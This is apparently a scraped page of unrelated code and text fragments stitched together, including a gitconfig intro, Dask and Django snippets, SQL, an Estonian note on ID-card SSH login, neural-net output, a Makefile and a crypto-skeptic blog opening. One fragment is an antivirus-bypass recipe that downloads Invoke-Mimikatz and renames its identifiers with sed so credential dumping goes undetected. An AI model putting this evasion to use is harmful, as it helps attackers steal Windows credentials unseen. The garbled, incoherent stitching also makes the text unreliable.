Git default configuration is good but it can be personalized to improve your workflow efficiency.
Here are some good lines to put in your ~/.gitconfig:
# The basics, who you commit as:
[user]
name = John Doe
email = john@doe.org| distributed: | |
| version: 2 | |
| scheduler: | |
| bandwidth: 1000000000 # 100 MB/s estimated worker-worker bandwidth | |
| worker: | |
| memory: | |
| target: 0.90 # target fraction to stay below | |
| spill: False # fraction at which we spill to disk | |
| pause: 0.80 # fraction at which we pause worker threads | |
| terminate: 0.95 # fraction at which we terminate the worker |
| import logging | |
| from time import sleep | |
| from multiprocessing import Process | |
| from django.core.management.base import BaseCommand, CommandError | |
| logger = logging.getLogger(__name__) | |
| select * from table t1 | |
| where (select count(*) from table t2 | |
| where t1.field = t2.field) > 1 | |
| order by field |
Juhiseid, kuidas ID-Kaardiga logida SSH kaudu sisse on kirjutatud juba 2011 aastast. Kirjutan natuke oma tähelepanekutest 2019 aastal ning ka sellest, kuidas kasutada ID Kaarti Windowsis Puttyga.
Smartcardi kasutamine võimaldab SSH ligipääsu erinevatest masinatest nii, et ei pea hakkama igas masinas võtmeid genereerima või masinate vahel võtmeid kopeerima. ID Kaart peaks olema enamustel Eestlastel olemas olema, seega hea võimalus on seda ära kasutada.
openssh-client versioon 8+
| $ python xor.py | |
| Training: | |
| Epoch 0 MSE: 1.765 | |
| Epoch 100 MSE: 0.015 | |
| Epoch 200 MSE: 0.005 | |
| * Target MSE reached * | |
| Evaluating: | |
| 1 XOR 0 = 1 ( 0.904) Error: 0.096 | |
| 0 XOR 1 = 1 ( 0.908) Error: 0.092 | |
| 1 XOR 1 = 0 (-0.008) Error: 0.008 |
| # Makefile for transpiling with Babel in a Node app, or in a client- or | |
| # server-side shared library. | |
| .PHONY: all clean | |
| # Install `babel-cli` in a project to get the transpiler. | |
| babel := node_modules/.bin/babel | |
| # Identify modules to be transpiled by recursively searching the `src/` | |
| # directory. |
| #After looking for a way to check if a model instance can be deleted in django , | |
| #i came across many sample, but was not working as expected. Hope this solution can help. | |
| #Let start by creating an Abstract model class which can be inherited by other model | |
| class ModelIsDeletable(models.Model): | |
| name = models.CharField(max_length=200, blank=True, null=True, unique=True) | |
| description = models.CharField(max_length=200, blank=True, null=True) | |
| date_modified = models.DateTimeField(auto_now_add=True) | |
| # AV Bypass to run Mimikatz | |
| # From: https://www.blackhillsinfosec.com/?p=5555 | |
| # Server side: | |
| wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
| sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
| sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |
Whenever the topic of Bitcoin's energy usage comes up, there's always a flood of hastily-constructed comments by people claiming that their favourite cryptocurrency isn't like Bitcoin, that their favourite cryptocurrency is energy-efficient and scalable and whatnot.
They're wrong, and are quite possibly trying to scam you. Let's look at why.
There are plenty of intricate and complex articles trying to convince you that cryptocurrencies are the future. They usually heavily use jargon and vague terms, make vague promises, and generally give you a sense that there must be something there, but you always come away from them more confused than you were before.